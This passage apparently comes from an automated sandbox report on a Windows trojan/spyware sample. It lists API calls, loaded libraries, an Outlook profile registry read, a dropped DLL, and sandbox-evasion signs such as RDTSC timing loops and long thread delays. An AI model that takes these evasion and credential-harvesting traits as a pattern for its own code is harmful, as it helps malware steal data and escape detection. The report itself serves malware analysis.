            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F35604_2_3A7F3560
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F03604_2_3A7F0360
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F03504_2_3A7F0350
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F4B404_2_3A7F4B40
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F19404_2_3A7F1940
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F61204_2_3A7F6120
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F2F204_2_3A7F2F20
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F45004_2_3A7F4500
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F13004_2_3A7F1300
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F41E04_2_3A7F41E0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F0FE04_2_3A7F0FE0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F0FD04_2_3A7F0FD0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F41D04_2_3A7F41D0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F57C04_2_3A7F57C0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F25C04_2_3A7F25C0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F6DA04_2_3A7F6DA0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F3BA04_2_3A7F3BA0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F09A04_2_3A7F09A0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F51804_2_3A7F5180
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F1F804_2_3A7F1F80
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A801CF04_2_3A801CF0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8084704_2_3A808470
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80FB304_2_3A80FB30
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A800E8B4_2_3A800E8B
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80A0904_2_3A80A090
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80D2904_2_3A80D290
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A800E984_2_3A800E98
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80BCB04_2_3A80BCB0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A808AB04_2_3A808AB0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80EEB04_2_3A80EEB0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80D8D04_2_3A80D8D0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80A6D04_2_3A80A6D0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A801CE04_2_3A801CE0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80F4F04_2_3A80F4F0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8090F04_2_3A8090F0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80C2F04_2_3A80C2F0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8004FB4_2_3A8004FB
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8000074_2_3A800007
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80C6104_2_3A80C610
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8094104_2_3A809410
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80F8104_2_3A80F810
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8018174_2_3A801817
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8018284_2_3A801828
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80B0304_2_3A80B030
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80E2304_2_3A80E230
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8000404_2_3A800040
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80CC414_2_3A80CC41
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A809A504_2_3A809A50
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80CC504_2_3A80CC50
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80E8704_2_3A80E870
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80B6704_2_3A80B670
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80B9904_2_3A80B990
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8087904_2_3A808790
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80EB904_2_3A80EB90
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80D5B04_2_3A80D5B0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80A3B04_2_3A80A3B0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8009BF4_2_3A8009BF
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80F1D04_2_3A80F1D0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8009D04_2_3A8009D0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A808DD04_2_3A808DD0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80BFD04_2_3A80BFD0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8035E84_2_3A8035E8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80DBF04_2_3A80DBF0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80A9F04_2_3A80A9F0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8005084_2_3A800508
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80AD104_2_3A80AD10
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80DF104_2_3A80DF10
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80C9304_2_3A80C930
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8097304_2_3A809730
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80E5504_2_3A80E550
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80B3504_2_3A80B350
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8013514_2_3A801351
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8013604_2_3A801360
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8033604_2_3A803360
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A809D704_2_3A809D70
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A80CF704_2_3A80CF70
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A841B504_2_3A841B50
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8430084_2_3A843008
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8436F04_2_3A8436F0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8414704_2_3A841470
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8429204_2_3A842920
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A840D884_2_3A840D88
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8422384_2_3A842238
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A841B3F4_2_3A841B3F
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8436E14_2_3A8436E1
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8414604_2_3A841460
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A840A034_2_3A840A03
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A840A104_2_3A840A10
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8429114_2_3A842911
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A842FFB4_2_3A842FFB
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A840D7B4_2_3A840D7B
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8422294_2_3A842229
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8400074_2_3A840007
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A8400404_2_3A840040
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A9397714_2_3A939771
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A930F744_2_3A930F74
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A9325304_2_3A932530
            Source: C:\Users\user\Desktop\JOSXXL1.exe Code function: String function: 00402BBF appears 51 times
            Source: JOSXXL1.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/7@6/5
            Source: C:\Users\user\Desktop\JOSXXL1.exe Code function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
            Source: C:\Users\user\Desktop\JOSXXL1.exe Code function: 4_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004033B6
            Source: C:\Users\user\Desktop\JOSXXL1.exe Code function: 0_2_004046E2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046E2
            Source: C:\Users\user\Desktop\JOSXXL1.exe Code function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\JOSXXL1.exe File created: C:\Users\user\AppData\Local\indvandrings
            Source: C:\Users\user\Desktop\JOSXXL1.exe Mutant created: NULL
            Source: C:\Users\user\Desktop\JOSXXL1.exe File created: C:\Users\user\AppData\Local\Temp\nsxA531.tmp
            Source: JOSXXL1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\JOSXXL1.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\JOSXXL1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: JOSXXL1.exe ReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\JOSXXL1.exe File read: C:\Users\user\Desktop\JOSXXL1.exe
            Source: unknown Process created: C:\Users\user\Desktop\JOSXXL1.exe "C:\Users\user\Desktop\JOSXXL1.exe"
            Source: C:\Users\user\Desktop\JOSXXL1.exe Process created: C:\Users\user\Desktop\JOSXXL1.exe "C:\Users\user\Desktop\JOSXXL1.exe"
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\JOSXXL1.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: JOSXXL1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: Yara match File source: 00000000.00000002.2321723084.000000000890B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\JOSXXL1.exe Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\JOSXXL1.exe Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\JOSXXL1.exe Code function: 4_3_0019CA98 pushfd ; retf 0019h 4_3_0019CA99
            Source: C:\Users\user\Desktop\JOSXXL1.exe Code function: 4_3_0019EE18 push eax; iretd 4_3_0019EE65
            Source: C:\Users\user\Desktop\JOSXXL1.exe Code function: 4_3_0019EE8C push eax; iretd 4_3_0019EEA9
            Source: C:\Users\user\Desktop\JOSXXL1.exe Code function: 4_3_0019CF4C push eax; iretd 4_3_0019CF4D
            Source: C:\Users\user\Desktop\JOSXXL1.exe Code function: 4_2_00159C30 push esp; retf 0017h 4_2_00159D55
            Source: C:\Users\user\Desktop\JOSXXL1.exe File created: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll (dropped file)
            Source: C:\Users\user\Desktop\JOSXXL1.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\JOSXXL1.exe; API/Special instruction interceptor: Address: 91911FA
            Source: C:\Users\user\Desktop\JOSXXL1.exe; API/Special instruction interceptor: Address: 49011FA
            Source: C:\Users\user\Desktop\JOSXXL1.exe; RDTSC instruction interceptor: First address: 9155A4B second address: 9155A4B instructions: 0x00000000 rdtsc 0x00000002 test ecx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4434F42160h 0x00000008 test cl, 00000015h 0x0000000b inc ebp 0x0000000c test ah, ch 0x0000000e inc ebx 0x0000000f test ch, 00000077h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\JOSXXL1.exe; RDTSC instruction interceptor: First address: 48C5A4B second address: 48C5A4B instructions: 0x00000000 rdtsc 0x00000002 test ecx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4434B962A0h 0x00000008 test cl, 00000015h 0x0000000b inc ebp 0x0000000c test ah, ch 0x0000000e inc ebx 0x0000000f test ch, 00000077h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Memory allocated: 110000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Memory allocated: 37450000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Memory allocated: 39450000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 599891
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 599782
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 599657
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 599532
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 599422
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 599313
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 599188
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 599063
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 598913
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 598688
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 598360
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 598229
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 598110
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 597985
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 597860
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 597735
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 597610
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 597485
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 597360
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 597191
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 597063
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 596938
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 596813
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 596688
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 596579
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 596454
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 596329
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 596204
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 596078
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 595969
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 595824
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 595477
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 595355
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 595247
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 595117
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 595000
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 594891
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 594766
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 594657
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 594532
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 594407
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 594297
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 594188
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 594063
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 593938
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 593813
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 593688
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 593578
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 593469
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Thread delayed: delay time: 593344
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Window / User API: threadDelayed 1665
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Window / User API: threadDelayed 8156
            Source: C:\Users\user\Desktop\JOSXXL1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll
            Source: C:\Users\user\Desktop\JOSXXL1.exe; API coverage: 1.7 %
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep count: 40 > 30
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -36893488147419080s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -599891s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6624; Thread sleep count: 1665 > 30
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6624; Thread sleep count: 8156 > 30
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -599782s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -599657s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -599532s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -599422s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -599313s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -599188s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -599063s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -598913s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -598688s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -598360s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -598229s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -598110s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -597985s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -597860s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -597735s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -597610s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -597485s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -597360s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -597191s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -597063s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -596938s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -596813s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -596688s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -596579s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -596454s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -596329s >= -30000s
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604; Thread sleep time: -596204s >= -30000s
